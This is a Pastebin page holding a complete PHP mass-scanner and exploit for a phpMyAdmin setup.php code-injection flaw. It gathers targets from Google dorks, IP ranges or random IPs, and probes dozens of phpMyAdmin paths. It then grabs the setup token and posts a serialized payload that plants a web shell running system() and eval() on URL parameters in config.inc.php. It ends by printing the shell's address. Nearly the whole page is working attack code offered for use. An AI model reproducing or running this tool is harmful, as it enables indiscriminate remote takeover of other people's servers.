Googleinurl

[SCANNER] phpMyAdmin Code Injection RCE Scanner & Exploit

Jun 26th, 2015
5,838
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. error_reporting(0);
  4. set_time_limit(0);
  5. ini_set('memory_limit', '256M');
  6. ini_set('display_errors', 0);
  7. ini_set('max_execution_time', 0);
  8. ini_set('allow_url_fopen', 1);
  9. /*
  10.  * ***************************************************************
  11.   pmaPWN.php - d3ck4, hacking.expose@gmail.com
  12.   phpMyAdmin Code Injection RCE Scanner & Exploit
  13.   This is PHP version original http://milw0rm.com/exploits/8921
  14.   credit: Greg Ose, pagvac @ gnucitizen.org
  15.   greetz: Hacking Expose!, HM Security, darkc0de
  16.  * ***************************************************************
  17.  
  18.   EDITADO POR GoogleINURL
  19.   blog.inurl.com.br
  20.  */
  21.  
  22.  
  23. $list = array(
  24.     '/phpmyadmin/',
  25.     '/phpMyAdmin/',
  26.     '/PMA/',
  27.     '/pma/',
  28.     '/admin/',
  29.     '/dbadmin/',
  30.     '/mysql/',
  31.     '/myadmin/',
  32.     '/phpmyadmin2/',
  33.     '/phpMyAdmin2/',
  34.     '/phpMyAdmin-2/',
  35.     '/php-my-admin/',
  36.     '/phpMyAdmin-2.2.3/',
  37.     '/phpMyAdmin-2.2.6/',
  38.     '/phpMyAdmin-2.5.1/',
  39.     '/phpMyAdmin-2.5.4/',
  40.     '/phpMyAdmin-2.5.5-rc1/',
  41.     '/phpMyAdmin-2.5.5-rc2/',
  42.     '/phpMyAdmin-2.5.5/',
  43.     '/phpMyAdmin-2.5.5-pl1/',
  44.     '/phpMyAdmin-2.5.6-rc1/',
  45.     '/phpMyAdmin-2.5.6-rc2/',
  46.     '/phpMyAdmin-2.5.6/',
  47.     '/phpMyAdmin-2.5.7/',
  48.     '/phpMyAdmin-2.5.7-pl1/',
  49.     '/phpMyAdmin-2.6.0-alpha/',
  50.     '/phpMyAdmin-2.6.0-alpha2/',
  51.     '/phpMyAdmin-2.6.0-beta1/',
  52.     '/phpMyAdmin-2.6.0-beta2/',
  53.     '/phpMyAdmin-2.6.0-rc1/',
  54.     '/phpMyAdmin-2.6.0-rc2/',
  55.     '/phpMyAdmin-2.6.0-rc3/',
  56.     '/phpMyAdmin-2.6.0/',
  57.     '/phpMyAdmin-2.6.0-pl1/',
  58.     '/phpMyAdmin-2.6.0-pl2/',
  59.     '/phpMyAdmin-2.6.0-pl3/',
  60.     '/phpMyAdmin-2.6.1-rc1/',
  61.     '/phpMyAdmin-2.6.1-rc2/',
  62.     '/phpMyAdmin-2.6.1/',
  63.     '/phpMyAdmin-2.6.1-pl1/',
  64.     '/phpMyAdmin-2.6.1-pl2/',
  65.     '/phpMyAdmin-2.6.1-pl3/',
  66.     '/phpMyAdmin-2.6.2-rc1/',
  67.     '/phpMyAdmin-2.6.2-beta1/',
  68.     '/phpMyAdmin-2.6.2-rc1/',
  69.     '/phpMyAdmin-2.6.2/',
  70.     '/phpMyAdmin-2.6.2-pl1/',
  71.     '/phpMyAdmin-2.6.3/',
  72.     '/phpMyAdmin-2.6.3-rc1/',
  73.     '/phpMyAdmin-2.6.3/',
  74.     '/phpMyAdmin-2.6.3-pl1/',
  75.     '/phpMyAdmin-2.6.4-rc1/',
  76.     '/phpMyAdmin-2.6.4-pl1/',
  77.     '/phpMyAdmin-2.6.4-pl2/',
  78.     '/phpMyAdmin-2.6.4-pl3/',
  79.     '/phpMyAdmin-2.6.4-pl4/',
  80.     '/phpMyAdmin-2.6.4/',
  81.     '/phpMyAdmin-2.7.0-beta1/',
  82.     '/phpMyAdmin-2.7.0-rc1/',
  83.     '/phpMyAdmin-2.7.0-pl1/',
  84.     '/phpMyAdmin-2.7.0-pl2/',
  85.     '/phpMyAdmin-2.7.0/',
  86.     '/phpMyAdmin-2.8.0-beta1/',
  87.     '/phpMyAdmin-2.8.0-rc1/',
  88.     '/phpMyAdmin-2.8.0-rc2/',
  89.     '/phpMyAdmin-2.8.0/',
  90.     '/phpMyAdmin-2.8.0.1/',
  91.     '/phpMyAdmin-2.8.0.2/',
  92.     '/phpMyAdmin-2.8.0.3/',
  93.     '/phpMyAdmin-2.8.0.4/',
  94.     '/phpMyAdmin-2.8.1-rc1/',
  95.     '/phpMyAdmin-2.8.1/',
  96.     '/phpMyAdmin-2.8.2/',
  97.     '/sqlmanager/',
  98.     '/mysqlmanager/',
  99.     '/p/m/a/',
  100.     '/PMA2005/',
  101.     '/pma2005/',
  102.     '/phpmanager/',
  103.     '/php-myadmin/',
  104.     '/phpmy-admin/',
  105.     '/webadmin/',
  106.     '/sqlweb/',
  107.     '/websql/',
  108.     '/webdb/',
  109.     '/mysqladmin/',
  110.     '/mysql-admin/',
  111. );
  112.  
  113. function filterHost($array = array()) {
  114.     if (!empty($array)) {
  115.         foreach ($array as $value) {
  116.             $real = parse_url("http://{$value}");
  117.             $_[] = "http://" . $real['host'];
  118.         }
  119.  
  120.         return array_filter(array_unique($_));
  121.     } else {
  122.  
  123.         return NULL;
  124.     }
  125. }
  126.  
  127. ################################################################################
  128. #GENERATOR RANGE IP#############################################################
  129. ################################################################################
  130.  
  131. function __generatorRangeIP($range) {
  132.  
  133.     $ip_ = explode(',', $range);
  134.     if (is_array($ip_)) {
  135.  
  136.         $_ = array(0 => ip2long($ip_[0]), 1 => ip2long($ip_[1]));
  137.         while ($_[0] <= $_[1]) {
  138.  
  139.             $ips[] = "http://" . long2ip($_[0]);
  140.             $_[0] ++;
  141.         }
  142.     } else {
  143.  
  144.         return FALSE;
  145.     }
  146.  
  147.     return $ips;
  148. }
  149.  
  150. ################################################################################
  151. #GENERATOR RANGE IP RANDOM######################################################
  152. ################################################################################
  153.  
  154. function __generatorIPRandom($cont) {
  155.  
  156.     $cont[0] = 0;
  157.     while ($cont[0] < $cont[1]) {
  158.  
  159.         $bloc[0] = rand(0, 255);
  160.         $bloc[1] = rand(0, 255);
  161.         $bloc[2] = rand(0, 255);
  162.         $bloc[3] = rand(0, 255);
  163.         $ip[] = "http://{$bloc[0]}.{$bloc[1]}.{$bloc[2]}.{$bloc[3]}";
  164.  
  165.         $cont[0] ++;
  166.     }
  167.     return array_unique($ip);
  168. }
  169.  
  170. $banner = "
  171. \t---------------------------------------------------------------
  172. \t        phpMyAdmin Code Injection RCE Scanner & Exploit
  173. \t  This is PHP version original http://milw0rm.com/exploits/8921
  174. \t        Edited by GoogleINURL - http://blog.inurl.com.br
  175. \t---------------------------------------------------------------
  176. \n";
  177.  
  178. if ($argc > 1) {
  179.     print $banner;
  180.     print "Usage: php $argv[0] \n";
  181.     exit;
  182. }
  183.  
  184. print $banner;
  185. print "\n";
  186. $Handlex = FOpen("pmaPWN.log", "a+");
  187. FWrite($Handlex, $banner);
  188.  
  189. print "[-] Master, where you want to go today? \n";
  190. print "[-] OPTIONS: \n";
  191. print "---------------------------------------------------------------------\n";
  192. print "[+] DORKING:         [ 1 ]\n";
  193. print "[+] RANGE IP:        [ 2 ]\n";
  194. print "[+] RANGE IP RANDOM: [ 3 ]\n";
  195. print "[+] VALUES FILE:     [ 4 ]\n";
  196. print "---------------------------------------------------------------------\n";
  197. fwrite(STDOUT, "\nGoogleINURL@scan:/options#  ");
  198. $op = trim(fgets(STDIN));
  199.  
  200. if ($op == 1) {
  201.     print "[-] example: intitle:phpMyAdmin\n";
  202.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_dork#  ");
  203.     $dork = urlencode(trim(fgets(STDIN)));
  204.     print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
  205.     FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
  206. //for($i = 0; $i <= 2; $i+=100) {
  207.     $ch = curl_init();
  208.     curl_setopt($ch, CURLOPT_URL, "https://www.google.com.br/search?q=$dork&num=1500&btnG=Search&pws=1");
  209.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  210.     curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  211.     curl_setopt($ch, CURLOPT_HEADER, 1);
  212.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  213.     curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
  214.     curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
  215.     $pg = curl_exec($ch);
  216.     curl_close($ch);
  217.  
  218. # MODIFICADO MOTOR DE BUSCA E REG DE VALIDAÇÃO BY GoogleINURL - 26/jun/2015
  219.    $html = str_replace('href="/url?q=', 'href="', $pg);
  220.     $html = str_replace('https://www.google.com.br', '', $html);
  221.     $html = str_replace('http://www.phpmyadmin.net', '', $html);
  222.  
  223.     preg_match_all("#(<h3 class=\"r\"><a href=\"http[s]?://(.*?)\">)#si", $html, $links);
  224.     $_ = array_filter(array_unique($links[2]));
  225.  
  226. //if (preg_match_all($reg, $html, $links)) { $res[] = $links[2]; }
  227. //}
  228.     $res = filterHost($_);
  229. }
  230.  
  231. if ($op == 2) {
  232.     print "\n[-] example: 200.107.69.1,200.107.69.255 \n";
  233.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_range#  ");
  234.     $value = (trim(fgets(STDIN)));
  235.     $res = __generatorRangeIP($value);
  236. }
  237.  
  238. if ($op == 3) {
  239.     print "\n[-] Amount of IPS / example: 255 \n";
  240.     fwrite(STDOUT, "GoogleINURL@scan:/options/set_range_rand#  ");
  241.     $value = (trim(fgets(STDIN)));
  242.     $res = __generatorIPRandom(array([0] => 0, 1 => $value));
  243. }
  244.  
  245. if ($op == 4) {
  246.     print "[-] example: hosts.txt ";
  247.     fwrite(STDOUT, "\nGoogleINURL@scan:/options/set_file#  ");
  248.     $value = (trim(fgets(STDIN)));
  249.     $res = array_unique(array_filter(explode("\n", file_get_contents($value))));
  250. }
  251.  
  252.  
  253.  
  254. (!isset($res) && empty($res) ? exit("\n[x] ERRO SEM RESULTADOS\n") : NULL);
  255. print "---------------------------------------------------------------------\n";
  256. $total = count($res);
  257. print "\n[+] Done. $total rows return.\n";
  258. FWrite($Handlex, "[+] Done. $total rows return.\n");
  259. FClose($Handlex);
  260.  
  261. //   foreach($res as $key) {
  262. $cont = 1;
  263. foreach ($res as $url) {
  264.  
  265.     $Handlex = FOpen("pmaPWN.log", "a+");
  266.     //$real = parse_url("http://{$target}");
  267.     //$url = "http://" . $real['host'];
  268.     print "\n[ {$cont} / {$total} ][-] Scanning phpMyAdmin on " . $url . "\n";
  269.     $cont++;
  270.     FWrite($Handlex, "\n[-] Scanning phpMyAdmin on " . $url . "\n");
  271.     FClose($Handlex);
  272.     sleep(5);
  273.     $curlHandle = curl_multi_init();
  274.     for ($i = 0; $i < count($list); $i++)
  275.         $curl[$i] = addHandle($curlHandle, $url . $list[$i]);
  276.     ExecHandle($curlHandle);
  277.     for ($i = 0; $i < count($list); $i++) {
  278.         $text[$i] = curl_multi_getcontent($curl[$i]);
  279.         //echo $url.$list[$i]."\n";
  280.         $Handlex = FOpen("pmaPWN.log", "a+");
  281.         if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
  282.             print "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]";
  283.             print "\n[+] Testing vulnerable, wait sec..\n";
  284.             FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]");
  285.             FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
  286.             if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
  287.                 print "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n";
  288.                 FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n");
  289.             }
  290.             FClose($Handlex);
  291.             exploit_site($url . $list[$i]);
  292.         }
  293.     }
  294.     for ($i = 0; $i < count($list); $i++)//remove the handles
  295.         curl_multi_remove_handle($curlHandle, $curl[$i]);
  296.     curl_multi_close($curlHandle);
  297.     sleep(5);
  298. }
  299.  
  300. // }
  301.  
  302. function addHandle(&$curlHandle, $url) {
  303.     $cURL = curl_init();
  304.     curl_setopt($cURL, CURLOPT_URL, $url);
  305.     curl_setopt($cURL, CURLOPT_HEADER, 0);
  306.     curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
  307.     curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
  308.     curl_setopt($cURL, CURLOPT_CONNECTTIMEOUT, 10);
  309.     curl_multi_add_handle($curlHandle, $cURL);
  310.     return $cURL;
  311. }
  312.  
  313. //execute the handle until the flag passed
  314. // to function is greater then 0
  315. function ExecHandle(&$curlHandle) {
  316.     $flag = null;
  317.     do {
  318. //fetch pages in parallel
  319.         curl_multi_exec($curlHandle, $flag);
  320.     } while ($flag > 0);
  321. }
  322.  
  323. function exploit_site($url) {
  324.     $ch = curl_init();
  325.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  326.     curl_setopt($ch, CURLOPT_HEADER, 1);
  327.     curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  328.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
  329.     curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
  330.     $result = curl_exec($ch);
  331.     curl_close($ch);
  332.     $ch2 = curl_init();
  333.     curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
  334.     curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  335.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
  336.     curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
  337.     $result2 = curl_exec($ch2);
  338.     curl_close($ch2);
  339.     //print $url;
  340.     if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
  341.         print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
  342.         print "\n[+] Exploiting, wait sec..\n";
  343.         $Handlex = FOpen("pmaPWN.log", "a+");
  344.         FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
  345.         FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
  346.         FClose($Handlex);
  347.         exploit($url);
  348.     } else {
  349.         $Handlex = FOpen("pmaPWN.log", "a+");
  350.         print "\n[-] Shit! no luck.. not vulnerable\n";
  351.         FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
  352.         FClose($Handlex);
  353.     }
  354. }
  355.  
  356. function exploit($w00t) {
  357.     $Handlex = FOpen("pmaPWN.log", "a+");
  358.     $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
  359.     //first get cookie + token
  360.     $curl = curl_init();
  361.     curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php"); //URL
  362.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  363.     curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  364.     curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  365.     curl_setopt($curl, CURLOPT_TIMEOUT, 100);
  366.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  367.     curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  368.     curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  369.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
  370.     curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  371.     curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  372.     $result = curl_exec($curl);
  373.     curl_close($curl);
  374.     if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches))
  375.         ;
  376.  
  377.     $token = $matches[1][1];
  378.     if ($token != '') {
  379.         print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
  380.         FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
  381.         $payload = "token=" . $token . "&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
  382.         print "\n[+] Sending evil payload mwahaha.. \n";
  383.         FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
  384.         $curl = curl_init();
  385.         curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
  386.         curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  387.         curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  388.         curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  389.         curl_setopt($curl, CURLOPT_REFERER, $w00t);
  390.         curl_setopt($curl, CURLOPT_POST, true);
  391.         curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
  392.         curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  393.         curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  394.         curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  395.         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  396.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  397.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  398.         $result = curl_exec($curl);
  399.         curl_close($curl);
  400.  
  401.         print "\n[!] w00t! w00t! You should now have shell here";
  402.         print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
  403.         print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
  404.         FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
  405.         FWrite($Handlex, "\n[+] " . $w00t . "config/config.inc.php?c=id \n");
  406.     } else {
  407.         print "\n[!] Shit! no luck.. not vulnerable\n";
  408.         FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
  409.         return false;
  410.     }
  411.     FClose($Handlex);
  412.     if (file_exists('exploitcookie.txt')) {
  413.         unlink('exploitcookie.txt');
  414.     }
  415.     //exit();
  416. }
RAW Paste Data